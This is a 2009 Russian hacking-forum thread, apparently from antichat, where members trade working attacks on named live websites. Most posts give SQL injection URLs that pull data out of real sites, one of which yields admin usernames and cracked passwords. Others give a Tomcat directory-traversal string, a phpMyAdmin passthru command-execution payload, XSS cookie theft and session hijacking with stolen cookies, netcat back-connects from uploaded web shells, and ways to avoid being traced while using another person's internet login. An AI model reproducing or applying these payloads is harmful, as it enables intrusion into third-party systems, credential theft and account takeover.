Здравствуйте нашел уязвимость Apache Tomcat v.5.5.26 Directory Traversal на одном игровом сервере http://la2midland.ru вот и мне сканер выдает такую строку http://la2midland.ru:80/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd что с этим можно сделать?

Gorev
10.03.2009, 16:55
^YaHoo^ ну ты типо читаешь файлы на сервере, ищи конфигурационные файлы и бери оттуда логины и пассы

^YaHoo^
10.03.2009, 16:59
спс)

DimOnOID
10.03.2009, 17:03
^YaHoo^ ну ты типо читаешь файлы на сервере, ищи конфигурационные файлы и бери оттуда логины и пассы
Где он читает файлы? покажи мне содержимое файла..етс пассв который он прочитал?....Лично он мне ничего не выдал....
Поэтому поиметь с этого ничего нельзя.

-m0rgan-
10.03.2009, 17:05
в принципе в etc/passwd храняися пассы но зашифрование...
так же можеш поискать такие полезности как:
/etc/httpd/conf/httpd.conf
/etc/php.ini
/etc/hosts
/etc/my.conf

дальше сам гляди, у меня сайт вапще не открылся =/

Gorev
10.03.2009, 17:08
2 -m0rgan- мне кажется что в etc/passwd нету ничего интересного, а пассы вроде в shadow хранятся

2 DimOnOID ты прав, мне тоже ничего не выдало, но увидев /etc/passwd дал ответ иcxодя из собственных соображений

DimOnOID
10.03.2009, 17:10
в принципе в etc/passwd храняися пассы но зашифрование...
так же можеш поискать такие полезности как:
/etc/httpd/conf/httpd.conf
/etc/php.ini
/etc/hosts
/etc/my.conf
/etc/passwd Уже стотыщь лет не хранит хешши паролей..и не обяз в папке /etc/ будут лежать эти файлы..на каждой машине они как правило по разному..

Gorev угу..а на shadow прав не хватит.

^YaHoo^
10.03.2009, 17:16
получается с этого поиметь ни чего нельзя да?

-m0rgan-
10.03.2009, 17:17
По дефолту, а по дефолту чаще всего, они лежат в /etc/ =)

>>/etc/passwd Уже стотыщь лет не хранит хешши паролей

точно не знаюсь на апаче но что то там расшифровуют)

H0ak1N
10.03.2009, 17:50
Скажите пожалуйста, есть ли в паблике эксплоиты Snapshot (ie6,ie7), util.printf (pdf), Collab.collectEmailInfo (pdf). Эксплоиты продаются в различных связках, но дата продаж - старая, а сплоиты актуальны. Черкните в ЛС, если кто может помочь.

Общеобразовательный вопрос: как происходит внедрение ява-скрипт эксплоита в сам файл .pdf (к вопросу о pdf-эксплоитов)?

Велемир
10.03.2009, 18:58
Как использовать дыру в пхпмайадминке?:



http://127.0.0.1/pma/server_databases.php?pos=0&dbstats=0&sort_by=%22])%20OR%20passthru($_GET[ccmd]);%20//&sort_order=desc&token=[my_valid_token]&ccmd=ls


Мне выдаёт в Доступе отказано.Че за токен ставить я не знаю =_=.Посему прописал так,как выше...Версия 2.9.1.1

Qwazar
11.03.2009, 00:38
чавой горишь там расшифровуют? о_О ежели инклуд у чувака, неполохо бы попробовать в логи писануть пиайчпи код и заинклудить. как это делается- на ачате инфа есть. Там же вроде бы говорится о читалке, а не об инклуде.

попугай
11.03.2009, 01:34
Как использовать дыру в пхпмайадминке?:



http://127.0.0.1/pma/server_databases.php?pos=0&dbstats=0&sort_by=%22])%20OR%20passthru($_GET[ccmd]);%20//&sort_order=desc&token=[my_valid_token]&ccmd=ls


Мне выдаёт в Доступе отказано.Че за токен ставить я не знаю =_=.Посему прописал так,как выше...Версия 2.9.1.1




token - параметр в адресной строке. Например так - http://localhost/phpmyadmin/index.php?db=mysql&token=206136e5c98e1cd2fa26fbd104ebc700

Stalingrad
11.03.2009, 01:54
http://comunist.md/index.php?idPaper=89/**/union+select+1,2,3,4,5,6,7+limit+1,1--

Обьясните пожалуйста зачем ставить в конце запроса
limit+1,1 . Почему не работает без LIMIT ?
(когда не получилось руками запустил в програме Sql Injection tool , и там есть галочка типа - использовать Limit 1,1 )

Jokester
11.03.2009, 02:05
Всё отлично работает
http://comunist.md/index.php?idPaper=-89 union select 1,2,concat_ws(0x3a,User(),Database(),Version()),4, 5,6,7--+

Stalingrad
11.03.2009, 02:11
А всётаки зачем в Sql injection tool 4 есть параметр LIMIT 1,1 ? Почему например в моем случае надо его ставить,как именно я составил запрос. (я забыл что надо ставить несуществуюшие данные типа idPaper=-89 )

И что означает {1} (сами ковычки { } ) в проге Sql injection tool ?:
Printable fields : {1},3,4,5,6,7

Gorev
11.03.2009, 02:22
2 Jokester,что делать если в скуле урезаются длина запроса

svesve
11.03.2009, 02:27
А всётаки зачем в Sql injection tool 4 есть параметр LIMIT 1,1 ? Почему например в моем случае надо его ставить,как именно я составил запрос. (я забыл что надо ставить несуществуюшие данные типа idPaper=-89 )

И что означает {1} (сами ковычки { } ) в проге Sql injection tool ?:
Printable fields : {1},3,4,5,6,7

Printable fields ( ака печатное поле)
скобками ты выделяешь столбец в который выводить данные

{1},3,4,5,6,7 - в перввый

f1ng3r
11.03.2009, 02:33
2 Jokester,что делать если в скуле урезаются длина запроса

запроса или вывода ? если вывода то через substring ... а может я и ошибаюсь ...

Gorev
11.03.2009, 02:37
вывода извиняюсь, через substring я знаю, есть ли другой способ?

Pashkela
11.03.2009, 03:44
сокращать сам запрос, все двойные числа заменить на одинарные, ну т.е.

union+select+1,2,3,4,5,6,7,8,9,10,11,12,13

заменить на

union+select+1,2,3,4,5,6,7,8,9,0,1,2,3

для начала. Даже на этом пример съекономилось 4 символа

f1ng3r
11.03.2009, 04:26
сокращать сам запрос, все двойные числа заменить на одинарные, ну т.е.

union+select+1,2,3,4,5,6,7,8,9,10,11,12,13

заменить на

union+select+1,2,3,4,5,6,7,8,9,0,1,2,3

для начала. Даже на этом пример съекономилось 4 символа

мы тут про вывод ;) :D

Seshh
11.03.2009, 10:20
Вопрос: Если XSS был найден посредством подставления вот этого скрипта: "><script>alert(document.cookie)</script>
http://img12.imageshack.us/img12/7390/111jcm.th.jpg (http://img12.imageshack.us/my.php?image=111jcm.jpg)
то дальнейшие мои действия для изъятия куки у жертвы такиеже, как и в случае еслибы я уязвимость нашол вот этим скриптом: "><script>alert(XSS)</script> ???

TreV@N
11.03.2009, 10:42
Да.Такие-же действия.

Jokester
11.03.2009, 12:18
Gorev
Не вполне понял вопрос.

Если скрипт обрезает выводимые данные, допустим до 15 символов, то , как тут уже сказали, SUBSTRING. Выглядеть это будет примерно так(для хеша 32):

1-е 15 символов
union select SUBSTRING(passwd, 0, 15) from user
c 15 по 30
SUBSTRING(passwd, 15, 30)
и остальные 2
SUBSTRING(passwd, 30, 32)

========================

Иногда встречается "наложение" вывода, ну например сдесь:
http://presscenter.kz/index.php?show=news&id=-1+union+select+concat_ws(0x3a,User(),Database(),Ve rsion()),2,3,4,5,6,7,8,9/*
Вот так нам не видно юзера

http://presscenter.kz/index.php?show=news&id=-1+union+select+concat_ws(0x3a,0x6C6F6C6F6C6F,User( ),Database(),Version()),2,3,4,5,6,7,8,9/*
А вот так видно всё

========================

Если на вопрос не ответил, поподробнее опиши проблему, что выводится, что не выводится, при каких условиях, и чем тебя SUBSTRING не устраивает

Велемир
11.03.2009, 14:41
token - параметр в адресной строке. Например так - http://localhost/phpmyadmin/index.php?db=mysql&token=206136e5c98e1cd2fa26fbd104ebc700

Ну,эт понятно... А почему не работает уязвимость в моей бд,непонятно.Вроде всё правильно делаю.

попугай
11.03.2009, 15:15
Ну,эт понятно... А почему не работает уязвимость в моей бд,непонятно.Вроде всё правильно делаю.


а ты в phpmyadminе залогинен?

joomler
11.03.2009, 16:07
Привет всем :) Ребят подскажите вот что:
Есть купи с другого компа, как их использовать?

-m0rgan-
11.03.2009, 16:12
В браузере вставляешь вместо своих куков на даном сайте и заходиш на него с сесией того, у кого ты их умыкнул...

joomler
11.03.2009, 16:52
а куда их вставлять? в строку броузера?

Gorev
11.03.2009, 16:57
не встроку а в место где куки опера -->tools-->preferences-->advanced-->coockies-->manage coockies

-m0rgan-
11.03.2009, 16:57
Неет!
В опере:
Инструменты->настройки->дополнительно->cookie->управление cookie

joomler
11.03.2009, 16:59
понятно а в эксплолере?

попугай
11.03.2009, 19:04
%USERPROFILE%\Cookies

joomler
11.03.2009, 19:13
а где это в эксплолере искать? по подробней если можно :)

joomler
11.03.2009, 19:32
посмотрел ссылку почитал сделал как показанно но произошла ошибка((( не импортируется ни чего

попугай
11.03.2009, 19:56
искать не надо ничего - открой проводник, вбей в адресную строку %USERPROFILE%\Cookies и туда скопируй файлы куков своих

joomler
11.03.2009, 20:07
Версия 7
попугай нашел куда вставлять куки , а как пароли от сайтов узнать пробовал заходить на сайт с установленной кукой другого компа и ни чего не произошло.. Подскажите ?

xcedz
11.03.2009, 20:14
опции безопасности на майл ру.
Запретить сохранять логин

Если опция "Запретить сохранять логин" включена, то сервер Mail.ru не будет запоминать и автоматически подставлять ваше учетное имя на странице входа в почтовую систему.
Запретить параллельные сессии

При включении опции "Запретить параллельные сессии" сервер Mail.ru будет обнаруживать двух и более одновременно работающих пользователей под одним учетным именем. Если это произойдет, сервер заблокирует более раннюю сессию.
Показывать информацию о последнем входе в систему

Включение опции "Показывать информацию о последнем входе в систему" позволит вам узнать, когда и с какого IP-адреса происходило последнее обращение к вашему почтовому ящику. Данные по входам через веб-интерфейс (HTTP) обновляются в режиме on-line (т.е. во время каждого следующего входа Вы увидите дату, время и IP-адрес предыдущего входа). Данные по входам через почтовые программы (РОР3) обновляются один раз в сутки (т.е. во время каждого входа Вы увидите дату, время и IP-адрес последнего входа за предыдущие сутки).
Использовать cookie для авторизации

Опцию "Использовать cookie для авторизации" предпочтительно не выключать. Включение этой опции позволяет системе сохранять сессию в данном п/я, при этом не нарушая безопасности этого п/я. Выключение этой опции нарушает безопасность, так как позволяет передавать информацию на чужие сайты. Выключать ее стоит только при "попадании" в чужой п/я (данная ошибка обычно возникает при неправильно настроенном proxy-сервере).
Сессия только с одного IP-адреса

Опцию "Сессия только с одного IP-адреса" предпочтительно включать всегда. Включение этой опции позволяет системе сохранять сессию в данном п/я, при этом не нарушая безопасности этого п/я. При включении этой опции проверяется, что все запросы в сессии идут с того же адреса, с которого она началась, если не с того, то сессия считается неправильной - и отправляет на авторизацию. Выключать опцию стоит только если Вас регулярно "выбрасывает" из п/я на авторизацию.

joomler
11.03.2009, 20:18
ааа то есть не покаждой куке можно узнать , а есть ли программы может в которую забиваешь куку и она выдает пароль?

xcedz
11.03.2009, 20:22
ааа то есть не покаждой куке можно узнать , а есть ли программы может в которую забиваешь куку и она выдает пароль?
http://www.citforum.ru/internet/html/cookie.shtml
http://www.nirsoft.net/web_browser_tools.html

Велемир
11.03.2009, 20:43
Пипл,нашёл папку на машине:

/usr/local/apache/etc/ssl.all

Там сертификационные файлы server.crt,server.key,mail.crt,mail.key,webmail.cr t,webmail.key... Чё с инми делать не пойму.Ключи там под RSA и приватные к тому же.С SSH-то понятно,а вот с SSL ещё дел не имел ).Мб кто подскажет,что надо делать,какие проги нужны ?

Neoveneficus
12.03.2009, 00:35
/usr/local/apache/etc/ssl.all
Мб кто подскажет,что надо делать,какие проги нужны ?

Хм... А что ты собрался делать?

Я так понимаю в этой папке лежат ключи, которые позволяют пользователям сайта/ов заходить на них, используя зашифрованное соединение ssl - это когда в адресной строке не http:// а https://. В этом случае трафик шифруется. Ключи выдаются специальными, уполномоченными на то, центрами сертификации.

Наличие сертификата сервера, если я не ошибаюсь, позволяет тебе провести атаку "человек по середине". Но не думаю, что если ты задаешь подобный вопрос, то тебе оно надо...

1west
12.03.2009, 15:31
Помогите разобраться!
Запрос такой
?cu=TT<script>alert('ok')</script>
вылитело окно -- ок

На странице появилось
Error in query
SELECT qnty_ FROM currency WHERE crncy='TT' ORDER BY date_ DESC LIMIT 1
1064: You have an error in your SQL syntax near 'ok')' ORDER BY date_ DESC LIMIT 1' at line 1

Вот мучаю скуль и никак пройти в перед не могу.
через order+by показывает 1 поле.

?cu=TT%27+union+select+111/*
You have an error in your SQL syntax near 'union select 111/*' ORDER BY date_ DESC LIMIT 1' at line 1

?cu=TT%27%2520union%2520select%2520null/*
Unknown column '20union' in 'where clause'

?cu=TT%27+and+(select+111)/*
You have an error in your SQL syntax near 'select 111)/*' ORDER BY date_ DESC LIMIT 1' at line 1

TreV@N
12.03.2009, 15:42
Сервер фильтрует / попробуй 1' UNION SELECT 1 --

Или стучись помогу 486503551

1west
12.03.2009, 16:14
Сервер фильтрует / попробуй 1' UNION SELECT 1 --

Или стучись помогу 486503551


здесь проблема в другом.
/* -- # без разници ошибка одна и таже.
как я понял тут только подзапросами можно.
но никак немогу и их использовать.

Gorev
12.03.2009, 16:27
2 1west урлу в студию , поможем

l1ght
12.03.2009, 18:08
select qnty_ from currency where crncy='('ok')' order by date_ desc limit 1
=> You have an error in your SQL syntax near 'ok')' ORDER BY date_ DESC LIMIT 1' at line 1
select qnty_ from currency where crncy='1' order by 1/* order by date_ desc limit 1
=> "через order+by показывает 1 поле."
select qnty_ from currency where crncy='1' union select 1/* order by date_ desc limit 1
mysql 3* => You have an error in your SQL syntax near 'union select 111/*' ORDER BY date_ DESC LIMIT 1' at line 1
select qnty_ from currency where crncy='1' and (select 111)/* order by date_ desc limit 1
mysql 3* => You have an error in your SQL syntax near 'select 111)/*' ORDER BY date_ DESC LIMIT 1' at line 1

хекерская догадка 45% (с)

IDW
12.03.2009, 19:37
http://www.prazdnik.by/calendar/?day=-1%27

Вот, инъекция есть, но немогу расковырять, чтобы не запрашивал не работает :(

[You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Март')))) ORDER BY BE.SORT asc' at line 1]

AkyHa_MaTaTa
12.03.2009, 19:40
Кавычки слешируються
'-1\\''))
фигасе запрос, походу автоматом(аля ORM-генерация) формируеться.

IDW
12.03.2009, 19:44
т.е. нельзя инъекцию провести?

R1dex
12.03.2009, 19:50
Можно, просто внимательно читай, что про синтаксис пишется.

IDW
12.03.2009, 19:54
:( можешь объяснить? а то я нуб полный :(

R1dex
12.03.2009, 19:54
http://www.prazdnik.by/calendar/?day=-12'))))+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4 7--+&month=3&year=2009

IDW
12.03.2009, 19:56
о, спасибо большое, сам бы ни за что не догадался, я за всю жизнь ток 1 инъекцию сделал, даже шелл залил оО, спс

PaCo
13.03.2009, 01:20
Это ниже 4 версии или я не правильно подобрал кол. выводимых колонок, потому как union не канает?
http://flb.ru/?path=81&message_id=40+group+by+8--+

Pashkela
13.03.2009, 01:24
пятая ветка:


http://flb.ru/?path=81&message_id=40+and+substring(version(),1,1)=5

AkyHa_MaTaTa
13.03.2009, 01:28
возможно какая то фильтрация :


http://flb.ru/?path=81&message_id=123+union%0Aselect+1,2,3,4,concat_ws(0x 3A,user(),version(),database()),6,7,8--+

apekoff
13.03.2009, 03:59
собственна давно интересует ламерский вопрос .
есть два ресурса( хостинга ) на обоих у меня залиты шеллы

1.

Software: Apache/2.0.59 (Unix). PHP/4.4.7

uname -a: FreeBSD ----------------- 6.2-RELEASE-p7 FreeBSD 6.2-RELEASE-p7 #0: Sat Aug 4 16:06:27
CEST 2007 root@--------.com:/usr/obj/usr/src/sys/1850 i386

uid=80(www) gid=80(www) groups=80(www)

Safe-mode: OFF (not secure)


2.

Software: Apache. PHP/5.2.6-1 uname -a: Linux 2.6.26-1-686 #1 SMP Sat Jan 10 18:29:31 UTC 2009 i686 uid=33(www-data) gid=33(www-data) groups=33(www-data) Safe-mode: OFF (not secure)

вот собственна ...
А теперь вопрос - как пользоваться NetCat если у меня не выделенный айпи
Есть хостинг покупной,Смотрел видео как коннектятся через Putty на домен ,ожидают бек коннекта ,биндят в шелле порт и подключаются и как там работает неткат . Попробовал на своем хосте на firstvds.ru - не работает . Нигде фака по инсталлу на сервер нетката не нашел поиск не рулит.
И второй вопрос - какой софт под эти оси нужен?
В обоих сервисах есть права на запись .
Нужен root.
Спасибо.

Iceangel_
13.03.2009, 05:57
А теперь вопрос - как пользоваться NetCat если у меня не выделенный айпи
бери ссх(можно попросить у знакомых, если нету), и там неткат на прослушку порта(nc -l -p порт ) и бекконекти (я через шелл от рст это делаю)

#4. Установка.. мде.. тут нужен рут :]
А вот если на ссх нетката нету, то не обязательно устанавливать, можно скомпилить и запускать потом ./netcat -l -p порт

diznt
13.03.2009, 11:32
http://www.theglobalreport.org/print.php?news_id=100'

Блин опять запариваюсь на скуле
Помогите с подбором

oRb
13.03.2009, 11:41
http://www.theglobalreport.org/print.php?news_id=100'

Блин опять запариваюсь на скуле
Помогите с подбором
http://www.theglobalreport.org/print.php?news_id=-100'+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22+--+

mailbrush
13.03.2009, 11:42
http://www.theglobalreport.org/print.php?news_id=-100'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22+--+

diznt
13.03.2009, 11:49
Ок спасибо

http://www.skai.gr/master_story.php?id=113998%27

Тут возможна иньекция?
Когда подставляю id=-1+union+select+1,2--
То пишет не найдено

Jokester
13.03.2009, 12:00
ветка 4
http://www.skai.gr/master_story.php?id=113998+and+substring(version() ,1,1)=4

Фильтрация union, select

http://www.skai.gr/master_story.php?id=113998+and+substring(version() ,1,1)=4/*select*/

PS. diznt давай уже что-то читать начни, а не только писать, всё это в статьях изложено и трудностей вызывать не должно, ты ведь не первый день на форуме

diznt
13.03.2009, 12:46
Вот еще такой вопрос (правда не по уязвимостям)
Если я к примеру сижу через чужой логин в инете
то как меня вычеслят? ну я имею ввиду что корбина узнает что мол кто то сидит с акка и как они меня будут искать? я понимаю что там у них мой адрес где я проживаю
но все таки интересует как они узнают что с этого адреса где я прожимаю сидели под чужим логином?

mailbrush
13.03.2009, 12:56
diznt, с корбиной не знаком, но разве у тебя нет локального адреса, под которым ты заходишь в инет?

diznt
13.03.2009, 13:17
mailbrush мне нужно подключаться самому

mailbrush
13.03.2009, 13:22
Эм.. Но ведь локалка есть? Если да - тебя вычислят по твоему внутреннему айпи.

Gorev
13.03.2009, 20:58
http://tksavelovskiy.ru/actions.html?s=3&a=34073'&page=1

Jokester твои мысли?

PaCo
13.03.2009, 21:15
я хоть и не великий и могучий Jokester но выскажу свое пмсм - не факт что там sql injection или вообше есть какая то уязвимость,никакие логические конструкции не проходят, значит по всей видимости в $_GET['a'] заноситься значения только если $_GET['a'] int (например $_GET['a']=is_numeric($_GET['a']) ? $_GET['a'] :1; ну или что типа такого) , а то что неустановлены индексы у массивов так вполне возможно что mysql_fetch_assoc и потом в скрипте идет обрашения к индексам без проверки их существования. Короче похоже на какую то логическую ошибку в скрипте.

Byrger
13.03.2009, 22:17
Если на сайте есть SQL-inj но не выводится ошибка...то как-то можно обойти?


А точнее если вызываю нарушение запроса таким способом 1' то выходит ошибка (похоже SQL класс подключен) ошибка ссылается на WHERE id='1''

( 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 )

А если прописываю так 1'+or+'2 то запрос нормально выполняется...
Как можно попробовать провести инъекцию?

AkyHa_MaTaTa
13.03.2009, 22:35
ну наверно стоит закрывать остальной запрос коментами, самым простым способом 1'+order+by+1--+(/*,%23), а вообще линк в студию, ну а вообще я не вижу в чем проблема, наверно все таки стоит начать читать статьи.

Byrger
13.03.2009, 22:43
ну наверно стоит закрывать остальной запрос коментами, самым простым способом 1'+order+by+1--+(/*,%23), а вообще линк в студию, ну а вообще я не вижу в чем проблема, наверно все таки стоит начать читать статьи.

Проблема то в том что ошибка не выводится....
А запрос проходит отлично.

PaCo
13.03.2009, 22:52
теперь от меня глупый вопрос, что здесь можно придумать
http://ozpp.ru/sovet/lesnyak'/

уж как я не извививался ничего не выходит

geezer.code
13.03.2009, 22:54
А если прописываю так 1'+or+'2 то запрос нормально выполняется...
Как можно попробовать провести инъекцию?

если комментарии поставить не удается. в чем я все таки сомневаюсь. можно работать как со слепой инъекцией
1'+and+substring(version(),1,1)=3+or+'2
Итд
хотя конечно бред ((

конструкция id='1' or '2' - нежизнеспособна.

geezer.code
13.03.2009, 22:59
теперь от меня глупый вопрос, что здесь можно придумать
http://ozpp.ru/sovet/lesnyak'/

уж как я не извививался ничего не выходит

тут ничего нет.

зы постом ниже лайт показал инъект, НО в ФФ3 я его не вижу (х_х)
в остальных браузерах ошибки итд. а в фф просто "страница не найдена."

поговорить об этом можно тут https://forum.antichat.ru/thread111019.html

l1ght
13.03.2009, 23:22
тут ничего нет.
вобщем, http://ozpp.ru/sovet/lesnyak'/**/union/**/select/**/1,2,3,4,5,6,7,user(),9,10,11,12/*

Tigger
14.03.2009, 03:12
У меня в городе есть хороший кинотеат - кронверксинема и я давно на их сайте нашел скулю) Но все никак не могу раскрутить до конца...
Решил тут вот запостить.
http://kronverkcinema.ru/repertoire/movies/watchmen'/**/union/**/select/**/1,2,3,4,5,6,7/* - это то до чего я добрался. Ошибка осталась, но при другом кол-ве полей еще одна ошибка вылезает => запрос правильный. Но выводимых полей нету... Чего я только не пробывал)

EmIL
14.03.2009, 03:13
http://www.rfbd.ru/

В общем из information_schema.tables вытягиваю нахожу таблицу jos_users. Далее делаю запрос WHERE+TABLE_NAME=0x6a6f735f7573657273

вот код:
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,column_name,10,11 ,12,13,14,15,16,17,18,19,20+from+information_schem a.colu mns+where+table_name=0x6a6f735f7573657273+limit+4, 1&region=72&rubrika=10
Оттуда с помощью LIMIT нахожу username, email, password.

Далее:
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,username,10,11,12 ,13,14,15,16,17,18,19,20+from+jos_users+limit+1,1&region=72&rubrika=10
И появляется ошибка. Что не так сделал?

hookman
14.03.2009, 03:23
http://www.rfbd.ru/

В общем из information_schema.tables вытягиваю нахожу таблицу jos_users. Далее делаю запрос WHERE+TABLE_NAME=0x6a6f735f7573657273

вот код:
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,column_name,10,11 ,12,13,14,15,16,17,18,19,20+from+information_schem a.colu mns+where+table_name=0x6a6f735f7573657273+limit+4, 1&region=72&rubrika=10
Оттуда с помощью LIMIT нахожу username, email, password.

Далее:
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,username,10,11,12 ,13,14,15,16,17,18,19,20+from+jos_users+limit+1,1&region=72&rubrika=10
И появляется ошибка. Что не так сделал?
Таблица находиться в другой БД

Tigger
14.03.2009, 03:27
http://www.rfbd.ru/

В общем из information_schema.tables вытягиваю нахожу таблицу jos_users. Далее делаю запрос WHERE+TABLE_NAME=0x6a6f735f7573657273

вот код:
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,column_name,10,11 ,12,13,14,15,16,17,18,19,20+from+information_schem a.colu mns+where+table_name=0x6a6f735f7573657273+limit+4, 1&region=72&rubrika=10
Оттуда с помощью LIMIT нахожу username, email, password.

Далее:
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,username,10,11,12 ,13,14,15,16,17,18,19,20+from+jos_users+limit+1,1&region=72&rubrika=10
И появляется ошибка. Что не так сделал?

Проверил... Там только две ДБ: a1rfbd_ric_datebase и test... Ни в одной jos_users не подходит. А вообще разве это Joomla? Да и папка /administration/ нету. Ищи другие таблицы...

EmIL
14.03.2009, 03:59
Я тож проверял...Просто я новичек. Изучаю в данный момент пхп+мускул...Но все таки не понимаю уязвимости! Просто я тож находил эти базы, с помощбю параметра database(), но так и не понял, из какой базы из них и каким образом извлечь нужные мне логин и пароль юзеров...Да, я находил другие таблицы, да, я некоторые проверял, но ни в одной из них не было таблиц username, email, password. А возможно, что админ просто изпользовал самодельные, известные только ему, названия таблиц? То есть когда я использовал table_name, было около 50 таблиц! Админ мог использовать какое-нибуть "левое" название для нужной мне таблицы, а найденную мной сделать "фейком"??

PaCo
14.03.2009, 04:00
У меня такой же вопрос как и у Tigger, если какой то способ кроме /**/ заменить пробелы, а то при чпу выходит фигня -
http://lib.aldebaran.ru/author/dolgova_elena/dolgova_elena_centurion'/
? И почему вот такой финт не проходит

http://lib.aldebaran.ru/author/dolgova_elena/dolgova_elena_centurion'%2f**%2forder%2f**%2fby%2f **%2f1/

@EmIL

test.jos_users=>id
test.jos_users=>name
test.jos_users=>username
test.jos_users=>email
test.jos_users=>password
test.jos_users=>usertype
test.jos_users=>block
test.jos_users=>sendEmail
test.jos_users=>gid
test.jos_users=>registerDate
test.jos_users=>lastvisitDate
test.jos_users=>activation
test.jos_users=>params


Иногда БД test просто фейк

S00pY
14.03.2009, 04:14
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,us ername,password,email),10,11,12,13,14,15,16,17,18, 19,20+from+test.jos_users

Tigger
14.03.2009, 04:20
Я тож проверял...Просто я новичек. Изучаю в данный момент пхп+мускул...Но все таки не понимаю уязвимости! Просто я тож находил эти базы, с помощбю параметра database(), но так и не понял, из какой базы из них и каким образом извлечь нужные мне логин и пароль юзеров...Да, я находил другие таблицы, да, я некоторые проверял, но ни в одной из них не было таблиц username, email, password. А возможно, что админ просто изпользовал самодельные, известные только ему, названия таблиц?


1) ДБ узнается через table_schema
2) Можно искать таблицы по именам полей, т.е. ПРИМЕР: 1,2,table_name,4,5+from+information_schema.tables+ where+column_name+like+'%user%'.

S00pY
14.03.2009, 04:24
У меня в городе есть хороший кинотеат - кронверксинема и я давно на их сайте нашел скулю) Но все никак не могу раскрутить до конца...
Решил тут вот запостить.
http://kronverkcinema.ru/repertoire/movies/watchmen'/**/union/**/select/**/1,2,3,4,5,6,7/* - это то до чего я добрался. Ошибка осталась, но при другом кол-ве полей еще одна ошибка вылезает => запрос правильный. Но выводимых полей нету... Чего я только не пробывал)
http://kronverkcinema.ru/repertoire/movies/watchmen'/**/union/**/select/**/1,2,3,version(),5,6,7/*
смотрим свойста имега(путь к картинке)
версия 5.0.21

Gorev
14.03.2009, 04:35
2 Tigger

http://kronverkcinema.ru/repertoire/movies/watchmen'/**/UNION/**/SELECT/**/1,2,3,(SELECT/**/CONCAT_WS(0x3a,u_login,u_password)/**/FROM/**/kronverk.0users/**/LIMIT/**/1,1),5,6,7/*

[0]:0admin:cb9bfe903a233a5e3e5db91f557efa49
[1]:user1:ae1276475fe133abcc93dff6bebc9413

Пароль не найден в паблик базе,
на passcracking.ru не найден

Tigger
14.03.2009, 04:52
http://kronverkcinema.ru/repertoire/movies/watchmen'/**/union/**/select/**/1,2,3,concat_ws(0x3a,id,u_login,u_password),5,6,7/**/from/**/0users/* - докрутил сам уж тут)
0admin:cb9bfe903a233a5e3e5db91f557efa49:vjhrjlfd
user1:ae1276475fe133abcc93dff6bebc9413:kronverk123

Вот так вот =)

Но к сожелению к /admin/ доступ запрещен =(
И фтп нету =(
Сейчас попробую через ssh и удаленно к БД можно попробывать

ЗЫ: Всем спасибо за помощь)

Byrger
14.03.2009, 08:59
http://adena.ru/checkout.html?id=1'


Не могу, решил выложить...

sabe
14.03.2009, 09:05
http://striweb.si.edu/esp/tesp/details.php?id=-1378+or+1=1/*
думаю 3 ветка. ( пр9

R1dex
14.03.2009, 10:32
http://striweb.si.edu/esp/tesp/details.php?id=-1378+or+1=1/*
думаю 3 ветка. ( пр9

Ну да..

http://striweb.si.edu/esp/tesp/details.php?id=1378+and+substring(version(),1,1)=3


http://adena.ru/checkout.html?id=1'


Не могу, решил выложить...

http://adena.ru/checkout.html?id=1'+and+substring(version(),1,1)=5/*

mailbrush
14.03.2009, 10:38
http://www.msm-5.ru/news.phtml?sid=79&nid=57 - стр. 57
http://www.msm-5.ru/news.phtml?sid=79&nid=57/**/ - стр. 57
http://www.msm-5.ru/news.phtml?sid=79&nid=57-2 - стр. 55

Это инъекция, но кол-во не могу подобрать - дошел до 20.

R1dex
14.03.2009, 10:41
http://www.msm-5.ru/news.phtml?sid=79&nid=57 - стр. 57
http://www.msm-5.ru/news.phtml?sid=79&nid=57/**/ - стр. 57
http://www.msm-5.ru/news.phtml?sid=79&nid=57-2 - стр. 55

Это инъекция, но кол-во не могу подобрать - дошел до 20.

3-ья ветка

http://www.msm-5.ru/news.phtml?sid=79&nid=57+and+substring(version(),1,1)=3

Byrger
14.03.2009, 10:42
Ну да..




Ничего же не происходит? где должен высветится ответ от SQL?

R1dex
14.03.2009, 10:43
Ничего же не происходит? где должен высветится ответ от SQL?

Это называется блинд инъекция..

Подробнее можно почитать, например, тут (http://forum.blackhack.ru/showthread.php?p=2141) .

mailbrush
14.03.2009, 10:43
Эм.. Крут. А во что енкодятся буквы? (ну типа символ = числу (скажите что за енкодинг))

Gorev
14.03.2009, 10:44
2 Byrger почитай про слепые скули

http://forum.antichat.ru/thread19844-blind+sql.html


2 mailbrush если я правильно тебя понял то это char
http://www.webfuture.ru/igo/convert.php

S0ulVortex
14.03.2009, 18:05
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''%' or entities.description like '%1'%') and (entities.keyword
Если переменная не фильтруется и включено сообщение о выводе ошибки. В моём случае возможно ченють вывести? При этом сообщение.

newpdv
14.03.2009, 18:52
Расскажите как можно добавить несколько одинаковых сайтов?
http://1xx.ru/1x9
http://s51.radikal.ru/i133/0903/26/d6c6613a39f9t.jpg (http://s51.radikal.ru/i133/0903/26/d6c6613a39f9.png)

Jokester
14.03.2009, 19:55
S0ulVortex

А как по твоему по ошибке можно сказать о наличии или отсутствие вывода?
Со 100% уверенностью нельзя даже сказать, есть там скуль или нет. Хотя. думаю, что есть и запрос будет примерно такой:
1') order by 1/* но это лишь предположение

